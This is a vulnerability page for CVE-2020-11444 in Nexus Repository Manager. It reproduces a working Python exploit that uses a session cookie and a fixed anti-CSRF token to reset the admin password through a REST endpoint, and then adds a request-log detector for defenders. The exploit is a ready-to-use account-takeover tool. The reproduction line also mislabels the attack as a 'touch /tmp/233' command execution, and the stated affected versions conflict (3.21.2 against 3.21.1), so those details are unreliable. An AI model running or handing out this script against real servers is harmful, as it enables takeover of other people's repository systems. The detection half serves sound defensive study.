(CVE-2020-11444) Nexus Repository Manager remote code execution vulnerability
1. Vulnerability overview
The vulnerability stems from improper access control. An attacker can exploit it with a specially crafted request to bypass access restrictions.
2. Affected versions
Nexus Repository Manager 3.x through 3.21.2
3. Reproduction steps
cve-2020-11444_exp.py
python3 cve-2020-11444_exp.py http://www.0-sec.org:8081 "sessionID" "touch /tmp/233"
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub
import sys
import requests

# Print usage and exit unless exactly three arguments were given.
if len(sys.argv) != 4:
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                           +')
    print('+ CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password                                +')
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url> <session> <password>                                             +')
    print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a 123456  +')
    print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                          +')
    print('+-----------------------------------------------------------------------------------------------+')
    sys.exit(0)

url = sys.argv[1]
# The REST endpoint that changes the admin user's password.
vuln_url = url + "/service/rest/beta/security/users/admin/change-password"
session = sys.argv[2]
password = sys.argv[3]
headers = {
    'accept': "application/json",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    'NX-ANTI-CSRF-TOKEN': "0.6080434247960143",
    'Content-Type': "text/plain",
    'Origin': "http://127.0.0.1:8081",
    # The anti-CSRF cookie must match the header above; the session ID is supplied by the caller.
    'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=" + session
}
# The request body is the new password as plain text.
data = """%s""" % password
r = requests.request('PUT', url=vuln_url, headers=headers, data=data)
# Nexus answers 204 No Content when the password was changed.
if r.status_code == 204:
    print("[+] Password Change Success")
    print("[+] " + url)
    print("[+] Username:admin Password:" + password)
else:
    print("[-] SessionID Not available")
    print("[-] Target Not CVE-2020-11444 Vuln Good Luck")
sys.exit(0)
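From the defender's side, the request the script above sends leaves a clear trace: a PUT to /service/rest/beta/security/users/<user>/change-password in the Nexus request log, issued by a session whose user is not the user named in the path. The following detector is an added example written for this page, not code from the exploit author or from Sonatype. It assumes the NCSA-style request.log format that Nexus 3 writes by default (the exact format is configurable, so adjust the regex to your deployment), also matches the v1 path in case the beta endpoint was promoted, and runs over a small constructed sample log embedded inline.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# NCSA-style request log line as Nexus 3 writes it (assumption: the format is
# configurable, so adapt this pattern to the deployment being monitored).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The endpoint the script on this page calls; the v1 path is matched too on
# the assumption that the beta API was later promoted.
CHANGE_PW_RE = re.compile(
    r'^/service/rest/(?:beta|v1)/security/users/(?P<target>[^/]+)/change-password$'
)


@dataclass
class Finding:
    ip: str
    actor: Optional[str]   # None when the request was anonymous ("-" in the log)
    target: str            # user whose password the request tried to change
    status: int
    reason: str


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(rec: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding for PUT requests to a change-password endpoint, else None."""
    if rec['method'] != 'PUT':
        return None
    pm = CHANGE_PW_RE.match(rec['path'])
    if pm is None:
        return None
    actor = None if rec['user'] == '-' else rec['user']
    target = pm.group('target')
    if actor is None:
        reason = 'anonymous password change attempt'
    elif actor != target:
        reason = 'cross-user password change'
    else:
        reason = 'self-service password change'
    return Finding(rec['ip'], actor, target, int(rec['status']), reason)


def scan(lines: List[str]) -> List[Finding]:
    """Run every line through the parser and classifier; unparseable lines are skipped."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        f = classify(rec)
        if f is not None:
            findings.append(f)
    return findings


def high_severity(findings: List[Finding]) -> List[Finding]:
    """A 204 on a change-password call that was not the user's own is the signature
    of a successful account takeover through this bug; that is what to alert on."""
    return [f for f in findings
            if f.status == 204 and f.reason != 'self-service password change']


# Constructed sample log, not real traffic. The third line models a successful
# abuse of the bug (a low-privileged session changing admin's password); the
# fourth models the same request against a fixed instance, which is rejected.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Apr/2020:10:00:01 +0000] "GET /service/rest/v1/status HTTP/1.1" 200 12 "-" "curl/7.68.0" [3]',
    '10.0.0.7 - alice [10/Apr/2020:10:00:05 +0000] "PUT /service/rest/beta/security/users/alice/change-password HTTP/1.1" 204 0 "-" "Mozilla/5.0" [41]',
    '10.0.0.9 - guest [10/Apr/2020:10:00:09 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 204 0 "-" "python-requests/2.23.0" [37]',
    '10.0.0.9 - - [10/Apr/2020:10:00:12 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 403 0 "-" "python-requests/2.23.0" [5]',
]

if __name__ == '__main__':
    for f in high_severity(scan(SAMPLE_LOG)):
        print(f'[ALERT] {f.ip} ({f.actor or "anonymous"}) changed password of {f.target}: {f.reason}')
```

Only the third sample line reaches the alert: a self-service change returning 204 is normal, and a rejected cross-user attempt (403) is worth recording but is evidence the fix is in place. Pairing this with a review of the /service/rest/beta/security/users/* paths in your audit log, and upgrading past the affected range, is the practical mitigation.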
References
https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444_exp.py